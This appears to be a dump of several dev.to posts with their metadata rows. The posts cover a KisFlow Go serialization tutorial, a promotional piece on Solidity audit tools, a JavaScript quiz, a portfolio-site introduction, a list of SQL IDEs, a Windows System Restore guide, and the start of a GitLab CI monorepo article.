serialization interfaces of `Serialize`. If they do, use the custom serialization interface; if not, use the `default DefaultSerialize{}` instance. > kis-flow/kis/faas.go ```go // NewFaaSDesc creates an FaaSDesc description instance based on the registered FnName and FaaS callback function func NewFaaSDesc(fnName string, f FaaS) (*FaaSDesc, error) { // ++++++++++ // Input/output serialization instance var serializeImpl Serialize // ++++++++++ // ... ... // ... ... // Iterate over the parameter types of the FaaS for i := 0; i < funcType.NumIn(); i++ { // Get the type of the i-th formal parameter paramType := funcType.In(i) if isFlowType(paramType) { // Check if it contains a parameter of type kis.Flow containsKisFlow = true } else if isContextType(paramType) { // Check if it contains a parameter of type context.Context containsCtx = true } else if isSliceType(paramType) { // Get the element type of the current parameter slice itemType := paramType.Elem() // If the current parameter is a pointer type, get the type pointed to by the pointer if itemType.Kind() == reflect.Ptr { itemType = itemType.Elem() // Get the type pointed to by the pointer } // +++++++++++++++++++++++++++++ // Check if f implements the Serialize interface if isSerialize(itemType) { // If the current parameter implements the Serialize interface, use the serialization implementation of the current parameter serializeImpl = reflect.New(itemType).Interface().(Serialize) } else { // If the current parameter does not implement the Serialize interface, use the default serialization implementation serializeImpl = defaultSerialize // Use global default implementation } // +++++++++++++++++++++++++++++++ } else { // Other types are not supported } // Append the current parameter type to the argsType collection argsType[i] = paramType } // ... ... // ... ... // Return the FaaSDesc description instance return &FaaSDesc{ Serialize: serializeImpl, FnName: fnName, f: f, fName: fullName, ArgsType: argsType, ArgNum: len(argsType), FuncType: funcType, FuncValue: funcValue, }, nil } ``` ### 11.2.5 Completing FaaS Data Serialization During Scheduling Finally, when scheduling FaaSDesc, if it is a custom slice parameter, deserialize the raw data of `flow.Input()` into the structure data required by the developer. Implement it as follows: > kis-flow/kis/pool.go ```go // CallFunction schedules the function func (pool *kisPool) CallFunction(ctx context.Context, fnName string, flow Flow) error { if funcDesc, ok := pool.fnRouter[fnName]; ok { // List of parameters for the scheduled function params := make([]reflect.Value, 0, funcDesc.ArgNum) for _, argType := range funcDesc.ArgsType { // If it is a Flow type parameter, pass the value of flow if isFlowType(argType) { params = append(params, reflect.ValueOf(flow)) continue } // If it is a Context type parameter, pass the value of ctx if isContextType(argType) { params = append(params, reflect.ValueOf(ctx)) continue } // If it is a Slice type parameter, pass the value of flow.Input() if isSliceType(argType) { // +++++++++++++++++++ // Deserialize the raw data in flow.Input() into the data of argType type value, err := funcDesc.Serialize.UnMarshal(flow.Input(), argType) if err != nil { log.Logger().ErrorFX(ctx, "funcDesc.Serialize.DecodeParam err=%v", err) } else { params = append(params, value) continue } // +++++++++++++++++++ } // If the passed parameter is neither Flow type, nor Context type, nor Slice type, give the default zero value params = append(params, reflect.Zero(argType)) } // Call the computation logic of the current function retValues := funcDesc.FuncValue.Call(params) // Get the first return value; if it is nil, return nil ret := retValues[0].Interface() if ret == nil { return nil } // If the return value is of type error, return the error return retValues[0].Interface().(error) } log.Logger().ErrorFX(ctx, "FuncName: %s Can not find in KisPool, Not Added.\n", fnName) return errors.New("FuncName: " + fnName + " Can not find in NsPool, Not Added.") } ``` This completes the integration of data serialization with the `FaaSDesc` module. Next, we will write a unit test to test this capability. ## 11.3 Unit Test for Custom Parameter Serialization ### 11.3.1 Definition of Flow and Function Configuration Files For unit testing, we create two Function configurations as follows: > kis-flow/test/load_conf/func/func-avgStuScore.yml ```yaml kistype: func fname: AvgStuScore fmode: Calculate source: name: Student Average Score must: - stu_id ``` > kis-flow/test/load_conf/func/func-PrintStuAvgScore.yml ```go kistype: func fname: PrintStuAvgScore fmode: Expand source: name: Student Average Score must: - stu_id ``` Next, we define a Flow to link the two functions together: > kis-flow/test/load_conf/flow/flow-StuAvg.yml ```yaml kistype: flow status: 1 flow_name: StuAvg flows: - fname: AvgStuScore - fname: PrintStuAvgScore ``` ### 11.3.2 Definition of Custom Base Data Proto In the `kis-flow/test/` directory, create a `proto/` folder and a custom base data proto for future data protocol reuse: > kis-flow/test/proto/stu_score.go ```go package proto // Student Scores type StuScores struct { StuId int `json:"stu_id"` Score1 int `json:"score_1"` Score2 int `json:"score_2"` Score3 int `json:"score_3"` } // Student's Average Score type StuAvgScore struct { StuId int `json:"stu_id"` AvgScore float64 `json:"avg_score"` } ``` ### 11.3.3 Define Two FaaS Callback Functions Define two FaaS functions: one to calculate a student's average score and one to print the student's average score: > kis-flow/test/faas/faas_stu_score_avg.go ```go package faas import ( "context" "kis-flow/kis" "kis-flow/serialize" "kis-flow/test/proto" ) type AvgStuScoreIn struct { serialize.DefaultSerialize proto.StuScores } type AvgStuScoreOut struct { serialize.DefaultSerialize proto.StuAvgScore } // AvgStuScore(FaaS) calculates the student's average score func AvgStuScore(ctx context.Context, flow kis.Flow, rows []*AvgStuScoreIn) error { for _, row := range rows { avgScore := proto.StuAvgScore{ StuId: row.StuId, AvgScore: float64(row.Score1+row.Score2+row.Score3) / 3, } // Submit the result data _ = flow.CommitRow(AvgStuScoreOut{StuAvgScore: avgScore}) } return nil } ``` The `AvgStuScore()` function is our improved FaaS function, where the third parameter rows `[]*AvgStuScoreIn` is a custom serialized parameter. Previously, we used `flow.Input()` to get the raw data and then traversed it. Although this method still works, it requires developers to manually assert and judge in the FaaS function, which increases development costs. Now, developers can describe a parameter's data through AvgStuScoreIn and use rows to get the already serialized structure, improving code readability and reducing development costs. The implementation for printing the average score FaaS is as follows: > kis-flow/test/faas/faas_stu_score_avg_print.go ```go package faas import ( "context" "fmt" "kis-flow/kis" "kis-flow/serialize" "kis-flow/test/proto" ) type PrintStuAvgScoreIn struct { serialize.DefaultSerialize proto.StuAvgScore } type PrintStuAvgScoreOut struct { serialize.DefaultSerialize } func PrintStuAvgScore(ctx context.Context, flow kis.Flow, rows []*PrintStuAvgScoreIn) error { for _, row := range rows { fmt.Printf("stuid: [%+v], avg score: [%+v]\n", row.StuId, row.AvgScore) } return nil } ``` Similar to the previous function, we use custom input parameters for logic development. ### 11.3.4 Unit Test Case Next, we write a test case for the above Flow: > kis-flow/test/kis_auto_inject_param_test.go ```go package test import ( "context" "kis-flow/common" "kis-flow/config" "kis-flow/file" "kis-flow/flow" "kis-flow/kis" "kis-flow/test/faas" "kis-flow/test/proto" "testing" ) func TestAutoInjectParamWithConfig(t *testing.T) { ctx := context.Background() kis.Pool().FaaS("AvgStuScore", faas.AvgStuScore) kis.Pool().FaaS("PrintStuAvgScore", faas.PrintStuAvgScore) // 1. Load the configuration files and build the Flow if err := file.ConfigImportYaml("load_conf/"); err != nil { panic(err) } // 2. Get the Flow flow1 := kis.Pool().GetFlow("StuAvg") if flow1 == nil { panic("flow1 is nil") } // 3. Submit raw data _ = flow1.CommitRow(&faas.AvgStuScoreIn{ StuScores: proto.StuScores{ StuId: 100, Score1: 1, Score2: 2, Score3: 3, }, }) _ = flow1.CommitRow(faas.AvgStuScoreIn{ StuScores: proto.StuScores{ StuId: 100, Score1: 1, Score2: 2, Score3: 3, }, }) // Submit raw data (JSON string) _ = flow1.CommitRow(`{"stu_id":101}`) // 4. Execute flow1 if err := flow1.Run(ctx); err != nil { panic(err) } } ``` When submitting raw data, we use the default serialization method, which supports JSON deserialization. In `CommitRow()`, we submit three pieces of data: the first two are structure data, and the last one is a JSON string. All of them are supported. Navigate to `kis-flow/test/` and execute: ```bash $ go test -test.v -test.paniconexit0 -test.run TestAutoInjectParamWithConfig ``` The result is as follows: ```bash $ go test -test.v -test.paniconexit0 -test.run TestAutoInjectParamWithConfig ... ... Add KisPool FuncName=AvgStuScore Add KisPool FuncName=PrintStuAvgScore ... ... Add FlowRouter FlowName=StuAvg context.Background ====> After CommitSrcData, flow_name = StuAvg, flow_id = flow-1265702bc905400da1788c0354080ded All Level Data = map[FunctionIdFirstVirtual:[0xc0002bab40 {DefaultSerialize:{} StuScores:{StuId:100 Score1:1 Score2:2 Score3:3}} {"stu_id":101}]] KisFunctionC, flow = &{Id:flow-1265702bc905400da1788c0354080ded Name:StuAvg Conf:0xc000286100 Funcs:map[AvgStuScore:0xc00023af80 PrintStuAvgScore:0xc00023b000] FlowHead:0xc00023af80 FlowTail:0xc00023b000 flock:{w:{state:0 sema:0} writerSem:0 readerSem:0 readerCount:0 readerWait:0} ThisFunction:0xc00023af80 ThisFunctionId:func-12a05e62a12a45fdade8477a3bddd2fd PrevFunctionId:FunctionIdFirstVirtual funcParams:map[func-12a05e62a12a45fdade8477a3bddd2fd:map[] func-7f308d00f4fa49488760ff1dfb85dc46:map[]] fplock:{w:{state:0 sema:0} writerSem:0 readerSem:0 readerCount:0 readerWait:0} buffer:[] data:map[FunctionIdFirstVirtual:[0xc0002bab40 {DefaultSerialize:{} StuScores:{StuId:100 Score1:1 Score2:2 Score3:3}} {"stu_id":101}]] inPut:[0xc0002bab40 {DefaultSerialize:{} StuScores:{StuId:100 Score1:1 Score2:2 Score3:3}} {"stu_id":101}] abort:false action:{DataReuse:false ForceEntryNext:false JumpFunc: Abort:false} cache:0xc000210b88 metaData:map[] mLock:{w:{state:0 sema:0} writerSem:0 readerSem:0 readerCount:0 readerWait:0}} context.Background ====> After commitCurData, flow_name = StuAvg, flow_id = flow-1265702bc905400da1788c0354080ded All Level Data = map[FunctionIdFirstVirtual:[0xc0002bab40 {DefaultSerialize:{} StuScores:{StuId:100 Score1:1 Score2:2 Score3:3}} {"stu_id":101}] func-12a05e62a12a45fdade8477a3bddd2fd:[{DefaultSerialize:{} StuAvgScore:{StuId:100 AvgScore:2}} {DefaultSerialize:{} StuAvgScore:{StuId:100 AvgScore:2}} {DefaultSerialize:{} StuAvgScore:{StuId:101 AvgScore:0}}]] KisFunctionE, flow = &{Id:flow-1265702bc905400da1788c0354080ded Name:StuAvg Conf:0xc000286100 Funcs:map[AvgStuScore:0xc00023af80 PrintStuAvgScore:0xc00023b000] FlowHead:0xc00023af80 FlowTail:0xc00023b000 flock:{w:{state:0 sema:0} writerSem:0 readerSem:0 readerCount:0 readerWait:0} ThisFunction:0xc00023b000 ThisFunctionId:func-7f308d00f4fa49488760ff1dfb85dc46 PrevFunctionId:func-12a05e62a12a45fdade8477a3bddd2fd funcParams:map[func-12a05e62a12a45fdade8477a3bddd2fd:map[] func-7f308d00f4fa49488760ff1dfb85dc46:map[]] fplock:{w:{state:0 sema:0} writerSem:0 readerSem:0 readerCount:0 readerWait:0} buffer:[] data:map[FunctionIdFirstVirtual:[0xc0002bab40 {DefaultSerialize:{} StuScores:{StuId:100 Score1:1 Score2:2 Score3:3}} {"stu_id":101}] func-12a05e62a12a45fdade8477a3bddd2fd:[{DefaultSerialize:{} StuAvgScore:{StuId:100 AvgScore:2}} {DefaultSerialize:{} StuAvgScore:{StuId:100 AvgScore:2}} {DefaultSerialize:{} StuAvgScore:{StuId:101 AvgScore:0}}]] inPut:[{DefaultSerialize:{} StuAvgScore:{StuId:100 AvgScore:2}} {DefaultSerialize:{} StuAvgScore:{StuId:100 AvgScore:2}} {DefaultSerialize:{} StuAvgScore:{StuId:101 AvgScore:0}}] abort:false action:{DataReuse:false ForceEntryNext:false JumpFunc: Abort:false} cache:0xc000210b88 metaData:map[] mLock:{w:{state:0 sema:0} writerSem:0 readerSem:0 readerCount:0 readerWait:0}} stuid: [100], avg score: [2] stuid: [100], avg score: [2] stuid: [101], avg score: [0] --- PASS: TestAutoInjectParamWithConfig (0.01s) PASS ok kis-flow/test 0.030s ``` ## 11.4 [V1.0] Source Code https://github.com/aceld/kis-flow/releases/tag/v1.0 --- Author: Aceld GitHub: https://github.com/aceld KisFlow Open Source Project Address: https://github.com/aceld/kis-flow Document: https://github.com/aceld/kis-flow/wiki --- [Part1-OverView](https://dev.to/aceld/part-1-golang-framework-hands-on-kisflow-streaming-computing-framework-overview-8fh) [Part2.1-Project Construction / Basic Modules](https://dev.to/aceld/part-2-golang-framework-hands-on-kisflow-streaming-computing-framework-project-construction-basic-modules-cia) [Part2.2-Project Construction / Basic Modules](https://dev.to/aceld/part-3golang-framework-hands-on-kisflow-stream-computing-framework-project-construction-basic-modules-1epb) [Part3-Data Stream](https://dev.to/aceld/part-4golang-framework-hands-on-kisflow-stream-computing-framework-data-stream-1mbd) [Part4-Function Scheduling](https://dev.to/aceld/part-5golang-framework-hands-on-kisflow-stream-computing-framework-function-scheduling-4p0h) [Part5-Connector](https://dev.to/aceld/part-5golang-framework-hands-on-kisflow-stream-computing-framework-connector-hcd) [Part6-Configuration Import and Export](https://dev.to/aceld/part-6golang-framework-hands-on-kisflow-stream-computing-framework-configuration-import-and-export-47o1) [Part7-KisFlow Action](https://dev.to/aceld/part-7golang-framework-hands-on-kisflow-stream-computing-framework-kisflow-action-3n05) [Part8-Cache/Params Data Caching and Data Parameters](https://dev.to/aceld/part-8golang-framework-hands-on-cacheparams-data-caching-and-data-parameters-5df5) [Part9-Multiple Copies of Flow](https://dev.to/aceld/part-8golang-framework-hands-on-multiple-copies-of-flow-c4k) [Part10-Prometheus Metrics Statistics](https://dev.to/aceld/part-10golang-framework-hands-on-prometheus-metrics-statistics-22f0) [Part11-Adaptive Registration of FaaS Parameter Types Based on Reflection](https://dev.to/aceld/part-11golang-framework-hands-on-adaptive-registration-of-faas-parameter-types-based-on-reflection-15i9) --- [Case1-Quick Start](https://dev.to/aceld/case-i-kisflow-golang-stream-real-time-computing-quick-start-guide-f51)
aceld
1,907,062
Solidity Audit Tools: Ensuring Smart Contract Security
The rise of blockchain technology and decentralized applications (DApps) has brought smart contracts...
0
2024-07-01T02:30:27
https://dev.to/akki_sarsaniya_e90f816375/solidity-audit-tools-ensuring-smart-contract-security-5c77
beginners, auditbase, smartcontract, webdev
![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gdub2zzejklto1vbht94.jpg) The rise of blockchain technology and decentralized applications (DApps) has brought smart contracts into the limelight. These self-executing contracts with the terms directly written into code have revolutionized various industries, from finance to supply chain management. However, with this technological advancement comes the need for robust security measures. Solidity, the primary programming language for Ethereum smart contracts, plays a critical role in this ecosystem. Ensuring the security and reliability of these contracts is paramount, and this is where Solidity audit tools come into play. This article delves into the importance of Solidity audit tools, their functionalities, and how they contribute to the security of smart contracts, particularly focusing on their relevance in the United States. The Importance of Solidity Audit Tools Solidity audit tools are essential for several reasons: Security: Smart contracts handle valuable assets and sensitive data. Any vulnerability can be exploited, leading to severe consequences, including financial loss and reputational damage. Reliability: Users must trust that the smart contracts they interact with will perform as intended. Audits ensure that contracts function correctly under various conditions. Compliance: In many jurisdictions, including the United States, there are regulatory requirements for security and data protection. Audits help ensure that contracts comply with these regulations. Optimization: Audits can identify inefficiencies in code, helping to optimize gas usage and improve the performance of smart contracts. Key Features of Solidity Audit Tools Solidity audit tools offer a range of features designed to thoroughly inspect and analyze smart contract code. Some of the key functionalities include: Static Analysis: This involves examining the code without executing it to find potential vulnerabilities. Static analysis tools can detect issues like uninitialized storage pointers, reentrancy vulnerabilities, and arithmetic overflows. Dynamic Analysis: Unlike static analysis, dynamic analysis involves executing the smart contract in a controlled environment to observe its behavior. This can help identify runtime errors and vulnerabilities that static analysis might miss. Formal Verification: This mathematical approach proves or disproves the correctness of algorithms underlying the smart contract with respect to a certain formal specification or property. Security Patterns: Tools often check if the code follows known security best practices and patterns, ensuring that common vulnerabilities are avoided. Gas Optimization: Analyzing the contract to ensure that it is cost-efficient in terms of gas usage, which is crucial for minimizing transaction costs on the Ethereum network. Popular Solidity Audit Tools Several [Solidity audit tool](https://www.auditbase.com/) are widely used in the industry. Here are a few notable ones: MythX: A comprehensive security analysis tool that uses a combination of static and dynamic analysis, symbolic execution, and formal verification to detect a wide range of vulnerabilities. Securify: Developed by ETH Zurich, Securify is a powerful static analysis tool that checks smart contracts for compliance with security patterns and best practices. Oyente: One of the first tools for analyzing smart contracts, Oyente uses symbolic execution to detect potential security issues. Slither: Created by Trail of Bits, Slither is a static analysis framework that detects vulnerabilities, prints visual information about contract details, and provides an API to easily write custom analyses. Echidna: A smart contract fuzzing tool designed to detect vulnerabilities and bugs by generating random inputs and observing the contract's behavior. The Audit Process The process of auditing a Solidity smart contract typically involves several steps: Preparation: Understanding the contract's intended functionality and business logic. This includes reviewing any documentation, specifications, and requirements. Automated Analysis: Running the contract through various automated audit tools to identify potential vulnerabilities and issues. Manual Review: Experienced auditors manually review the code to catch issues that automated tools might miss and to understand the context of any flagged issues. Testing: Writing and executing test cases to validate the contract's functionality and security. This includes unit tests, integration tests, and end-to-end tests. Reporting: Compiling a detailed report that outlines the findings, including any identified vulnerabilities, their severity, and recommended fixes. Remediation: The development team addresses the identified issues, often in consultation with the auditors to ensure that the fixes are effective and do not introduce new vulnerabilities. Re-Audit: After remediation, the contract is often re-audited to verify that all issues have been resolved and no new issues have been introduced. The Role of Solidity Audit Tools in the United States The United States has emerged as a significant player in the blockchain and cryptocurrency space, with numerous projects and startups developing innovative solutions. As the industry grows, so does the importance of security. Solidity audit tools play a crucial role in this ecosystem by ensuring that smart contracts are secure, reliable, and compliant with regulatory standards. Regulatory Compliance In the United States, regulatory bodies like the Securities and Exchange Commission (SEC) and the Commodity Futures Trading Commission (CFTC) have been increasingly focused on the cryptocurrency sector. Ensuring compliance with regulations is vital for any project looking to operate within the US. Solidity audit tools help developers identify and address potential compliance issues, reducing the risk of legal complications. Investor Confidence For blockchain projects, gaining investor confidence is essential. Thoroughly audited smart contracts demonstrate a commitment to security and reliability, making it easier to attract investment. Solidity audit tools provide the assurance that contracts have been rigorously tested and are free from vulnerabilities. Innovation and Growth The United States is home to a vibrant tech ecosystem, with numerous startups and established companies exploring blockchain technology. Solidity audit tools enable these innovators to develop secure and reliable solutions, fostering growth and adoption of blockchain technology across various sectors. Future Trends in Solidity Audit Tools As the blockchain industry continues to evolve, so too will the tools and methodologies used for auditing smart contracts. Some future trends to watch for include: Integration with Development Environments: Solidity audit tools will increasingly integrate with popular development environments, making it easier for developers to perform continuous security checks throughout the development process. AI and Machine Learning: Advanced AI and machine learning techniques will enhance the capabilities of audit tools, enabling them to identify new and emerging types of vulnerabilities more effectively. Cross-Platform Audits: As blockchain technology expands beyond Ethereum to other platforms like Binance Smart Chain, Polkadot, and Solana, audit tools will evolve to support cross-platform audits, ensuring security across diverse ecosystems. Community-Driven Audits: Open-source and community-driven audit initiatives will become more prevalent, leveraging the collective expertise of the blockchain community to enhance security. In the world of blockchain and smart contracts, security cannot be overstated. Solidity audit tools are indispensable for ensuring that smart contracts are secure, reliable, and compliant with regulatory standards. These tools provide a comprehensive analysis of smart contract code, identifying potential vulnerabilities and optimizing performance. For projects operating in the United States, the importance of robust security measures is even more pronounced due to regulatory requirements and the need to build investor confidence. By leveraging advanced Solidity audit tools, developers can create secure and reliable smart contracts that foster innovation and growth in the blockchain space. At AuditBase, we specialize in providing top-tier audit services to ensure the security and reliability of your smart contracts. Our team of experienced auditors utilizes the latest tools and methodologies to deliver comprehensive audit reports that help you address vulnerabilities and optimize your contracts. Whether you're a startup or an established company, AuditBase is your trusted partner in achieving blockchain security. Contact us today to learn more about our services and how we can help you secure your smart contracts. Frequently Asked Questions (FAQs) 1. What are Solidity audit tools? Solidity audit tools are specialized software applications designed to analyze Solidity smart contract code for vulnerabilities, inefficiencies, and potential compliance issues. These tools utilize various techniques such as static analysis, dynamic analysis, and formal verification to ensure that smart contracts are secure and reliable. 2. Why are Solidity audit tools important? Solidity audit tools are crucial for several reasons: Security: They help identify and mitigate vulnerabilities that could be exploited. Reliability: Ensuring smart contracts function as intended under various conditions. Compliance: Meeting regulatory standards and avoiding legal issues. Optimization: Improving gas efficiency and overall performance of smart contracts. 3. What types of vulnerabilities can Solidity audit tools detect? Solidity audit tools can detect a wide range of vulnerabilities, including: Reentrancy attacks Integer overflows and underflows Uninitialized storage pointers Gas limit issues Access control weaknesses Logic errors and unintended behaviors 4. How do Solidity audit tools work? Solidity audit tools use different methods to analyze smart contracts: Static Analysis: Examines the code without executing it to identify potential vulnerabilities. Dynamic Analysis: Executes the code in a controlled environment to observe its behavior and identify runtime issues. Formal Verification: Uses mathematical methods to prove the correctness of the code against a formal specification. 5. What are some popular Solidity audit tools? Several popular Solidity audit tools include: MythX: A comprehensive security analysis tool. Securify: A static analysis tool developed by ETH Zurich. Oyente: One of the first smart contract analysis tools using symbolic execution. Slither: A static analysis framework by Trail of Bits. Echidna: A smart contract fuzzing tool. 6. How often should smart contracts be audited? Smart contracts should be audited: Before Deployment: To ensure they are secure and function correctly. After Major Changes: Anytime significant changes or updates are made to the contract. Regularly: Periodic audits to ensure continued security and compliance as the blockchain ecosystem evolves. 7. Can automated audit tools replace manual audits? While automated audit tools are powerful and can identify many vulnerabilities, they cannot entirely replace manual audits. Experienced auditors provide critical insights and context that automated tools might miss, ensuring a comprehensive review of the smart contract code. 8. How do I choose the right Solidity audit tool for my project? Choosing the right Solidity audit tool depends on: The complexity of your smart contract: More complex contracts may require more advanced tools. Specific needs: Some tools specialize in certain types of analysis (e.g., static vs. dynamic analysis). Budget: Some tools are free and open-source, while others require a subscription or license. 9. What should be included in a smart contract audit report? A comprehensive [move smart contract audit](https://www.auditbase.com/move-smart-contract-audit) report should include: Executive Summary: Overview of the audit findings and overall security posture. Detailed Findings: List of identified vulnerabilities, their severity, and recommended fixes. Code Analysis: Insights into the contract’s functionality and behavior. Test Results: Outcomes of any tests conducted during the audit. Recommendations: Suggestions for improving security and performance. 10. How can AuditBase help with my smart contract audit needs? AuditBase specializes in providing top-tier audit services to ensure the security and reliability of your smart contracts. Our team of experienced auditors uses the latest tools and methodologies to deliver comprehensive audit reports. We help you address vulnerabilities, optimize performance, and ensure compliance with regulatory standards. Contact AuditBase today to learn more about our services and how we can help you secure your smart contracts. [Read More ](https://dev.to/)
akki_sarsaniya_e90f816375
1,907,070
Javascript Quizzes You Can't Solve
Q1 console.log(018 - 015); console.log("018" - "015"); Enter fullscreen mode ...
0
2024-07-01T02:53:04
https://dev.to/untilyou58/javascript-quizzes-you-cant-solve-44mp
javascript, webdev, learning
### Q1 ```js console.log(018 - 015); console.log("018" - "015"); ``` ### Q2 ```js const isTrue = true == []; const isFalse = true == ![]; console.log ( isTrue + isFalse); ``` ### Q3 ```js console.log(3 > 2 > 1); ``` ### Q4 ```js console.log(typeof typeof 1); ``` ### Q5 ```js console.log(('b' + 'a' + + 'a' + 'a').toLowerCase()); ``` ### Q6 ```js console.log(typeof NaN); ``` ### Q7 ```js console.log(0.1 + 0.2 == 0.3); ``` ### Q8 ```js const numbers = [33, 2, 8]; numbers.sort(); console.log(numbers[1]) ``` ## Conclusion What percentage of the eight questions were correct? If you get all of them right, please leave a comment! ## Ref - [Javascript quizz](https://javascriptquiz.com/) - [The original article](https://qiita.com/twrcd1227/items/a64c3f22da46ff2c0fbd#comments)
untilyou58
1,907,069
Exploring SmartFolio: Your Dynamic Web Diary
Introduction: Introduce SmartFolio briefly. Mention its purpose as a dynamic web diary that...
27,919
2024-07-01T02:47:04
https://elavarasan.me
portfolio, react, nextjs, blog
**Introduction:** Introduce SmartFolio briefly. Mention its purpose as a dynamic web diary that simplifies sharing thoughts, ideas, and creations online. [www.elavarasan.me](https://elavarasan.me) [Source Code](https://github.com/follow-prince/SmartFolio) ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/55lkv8lr7jgr196vg8j6.png) **Features of SmartFolio:** 1. **Real-time Updates:** Discuss how SmartFolio syncs changes seamlessly to Notion pages. 2. **Easy Navigation:** Highlight its clear outline for effortless content navigation. 3. **Customizable Themes:** Explain the ability to switch between different themes. 4. **Language Support:** Mention support for multiple languages. 5. **Engagement Tools:** Include native-style comments and Telegram bot integration. 6. **SEO and Optimization:** Talk about built-in SEO and Open Graph optimization. 7. **Newsletter and Contact Form Integration:** Discuss the ability to keep audience engaged and connected. **Getting Started:** 1. **Prerequisites:** Mention the requirement of having pnpm installed. 2. **Installation Guide:** - Clone the repository: `https://github.com/follow-prince/SmartFolio.git` - Navigate to the project directory: `cd smartfolio` - Install dependencies: `pnpm install` **Development and Deployment:** 1. **Development:** - Start the development server: `./dev.sh` 2. **Building and Deployment:** - Build the project: `pnpm build` - Serve the built project: `pnpm start` **Contributing:** Encourage readers to contribute to SmartFolio, linking to the contributing guidelines. **Reference and License:** 1. Mention Nobelium, if relevant. 2. License: Note that SmartFolio is licensed under the MIT License. **Acknowledgments:** Thank contributors and supporters who have contributed to SmartFolio. **Conclusion:** Summarize the benefits and uniqueness of SmartFolio. Encourage readers to explore and utilize it for their web diary needs. {% embed https://elavarasan.me %}
follow_prince
1,907,068
Best SQL Developer IDE & Tools for Increasing Productivity
As a database developer, you probably already know about SQL editor tools and SQL integrated...
0
2024-07-01T02:45:32
https://dev.to/concerate/best-sql-developer-ide-tools-for-increasing-productivity-2g76
As a database developer, you probably already know about SQL editor tools and SQL integrated development environment (IDE) which help you manage databases at the top level. But did you know that there are a host of popular SQL IDE tools that can boost your productivity? Here’s a curated list of the top selections along with their key functionalities and usability. Analyze them well and choose the ones that best fit your requirement. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/q8qpw2hc4240h2d6l2hm.png) The best SQL IDE tools to enhance productivity Though not exhaustive, this list highlights the top SQL IDE tools to use. **SQLynx** The SQLynx product series is designed to meet the needs of users of various scales and requirements, from individual developers and small teams to large enterprises. SQLynx offers suitable solutions to help users manage and utilize databases efficiently and securely. Choose SQLynx to experience the powerful features and outstanding performance of a modern SQL editor. Enterprise-Level Collaboration: Web-based support for large-scale team collaboration, offering detailed permission management, version control, and approval processes. Powerful SQL editor supporting multiple databases (e.g., MySQL, PostgreSQL, Oracle, SQL Server). Intuitive user interface with SQL editing, syntax highlighting, auto-completion, and code formatting. Database object browser for easy viewing and management of database structures. Data export and import features supporting various formats (e.g., CSV, Excel,JSON). Focused on enhancing the productivity of SQL developers and data analysts by providing robust query editing, data visualization, and debugging and optimization tools. **DBeaver** As a database developer you know SQL statements that help you start backups and ad-hoc querying along with troubleshooting tactics. DBeaver is one of the top SQL developer tools for simplifying these tasks. You can use the SQL IDE tool across multiple platforms. It supports almost all databases like MariaDB, PostgreSQL, MySQL, and YugabyteDB. What gives DBeaver an edge is that it is open-source, whereas most of its competitors are not. **MySQL Workbench** The next top SQL tool on our list is MySQL Workbench which contains a lot of valuable features. With it, you can generate and manage databases and create a complex ER model. You can even manage complicated documentation processes and assign management tasks easily - something that is usually time-consuming.
concerate
1,907,066
Don't Panic! Recover Your Windows Crash with System Restore Points
Has your once-reliable Windows PC become sluggish, unstable, or even crashed entirely? Don't despair!...
0
2024-07-01T02:44:28
https://dev.to/tahirdotdev/dont-panic-recover-your-windows-crash-with-system-restore-points-10jb
tricks, windows, hacks, techtalks
Has your once-reliable Windows PC become sluggish, unstable, or even crashed entirely? Don't despair! Before you consider drastic measures like a full system reinstall, there's a handy built-in tool called System Restore Point that can be your digital guardian angel. ## What is System Restore Point? Think of a System Restore Point as a time machine for your computer. It takes a snapshot of your system's settings, files, and drivers at a specific point in time. This allows you to revert your PC back to that state if something goes wrong in the future, like a bad software installation or a buggy update. Here is a video tutorial of my YouTube channel to assist you: https://www.youtube.com/watch?v=CDHg_P5ZJKM ## Why Use System Restore Point? Recover from Software Issues: Installed a new program that messed things up? System Restore can take you back to a point before the installation, effectively undoing the damage. Rollback Faulty Updates: Sometimes, Windows updates can introduce problems. System Restore lets you revert to a point before the update, giving you time to wait for a fix. Rescue from System Instability: Experiencing random crashes, freezes, or strange behavior? Restoring to a stable point can get your PC back on track. ## Here's How to Use System Restore Point: 1. **Enable System Protection (if not already on):** - Search for "System Protection" in the Windows search bar. - Click "Create a restore point" under the relevant drive (usually C:). - Enable "Turn on system protection" and allocate some disk space for restore points (e.g., 5-10%). - Click "Apply" and "OK" to activate System Protection. 2. **Performing a System Restore: ** - Search for "Control Panel" and open it. - Search for "Recovery" and select "Open System Restore." - Click "Next" to proceed with system restore. - Choose a desired restore point (ideally one created before the issue started). - Confirm your selection and click "Finish" to initiate the restore process. Important Notes: - System Restore won't affect your personal files like documents, photos, or music. - However, it will remove applications, drivers, and updates installed after the chosen restore point. - Make sure you have a recent backup of important data before performing a System Restore. By having System Restore Points enabled, you gain a valuable safety net against software mishaps. So, create restore points regularly, especially before installing new programs or applying major updates. Remember, prevention is always better than cure, and System Restore Point can be your knight in shining armor when your Windows PC needs a reset! Follow for more! Instagram: https://instagram.com/@tahirdotdev Facebook: https://facebook.com/@tahirdotdev YouTube: https://youtube.com/@tahirdotdev
tahirdotdev
1,897,854
GitLab CI/CD Pipelines: Best Practices for Monorepos
Hello everyone! This article is for those who want to optimize their CI/CD pipelines using best...
0
2024-07-01T02:42:52
https://dev.to/ichintansoni/gitlab-cicd-pipelines-best-practices-for-monorepos-cba
gitlab, cicd, pipeline
Hello everyone! This article is for those who want to optimize their CI/CD pipelines using best practices in a monorepo setup. To provide a clear walkthrough, let’s consider the following example: **Project structure:** ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9sd3js5y3d96qrweu20o.png) **Initial .gitlab-ci.yml:** ```yml stages: - build - test - deploy build-a: stage: build script: - ... test-a: stage: test script: - ... deploy-a: stage: deploy script: - ... build-b: stage: build script: - ... test-b: stage: test script: - ... deploy-b: stage: deploy script: - ... build-c: stage: build script: - ... test-c: stage: test script: - ... deploy-c: stage: deploy script: - ... ``` The above configuration can quickly become unmanageable as the number of projects in the monorepo increases. ## Why is this a problem? - **Unnecessary Job Triggers:** A single commit will trigger all jobs, regardless of the scope of the change. For instance, a commit made for changes in project-a will also trigger jobs for project-b and project-c, which is inefficient.. ![Screenshot of original pipeline](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pehiota46yud0483i6c1.png) - **Reduced Readability:** The CI/CD configuration becomes less readable and harder to maintain, especially with environment-specific jobs for dev, QA, UAT, and prod. - **Increased Complexity:** The setup becomes fragile, making it easy for anyone to inadvertently disrupt the pipeline. It requires more expertise to 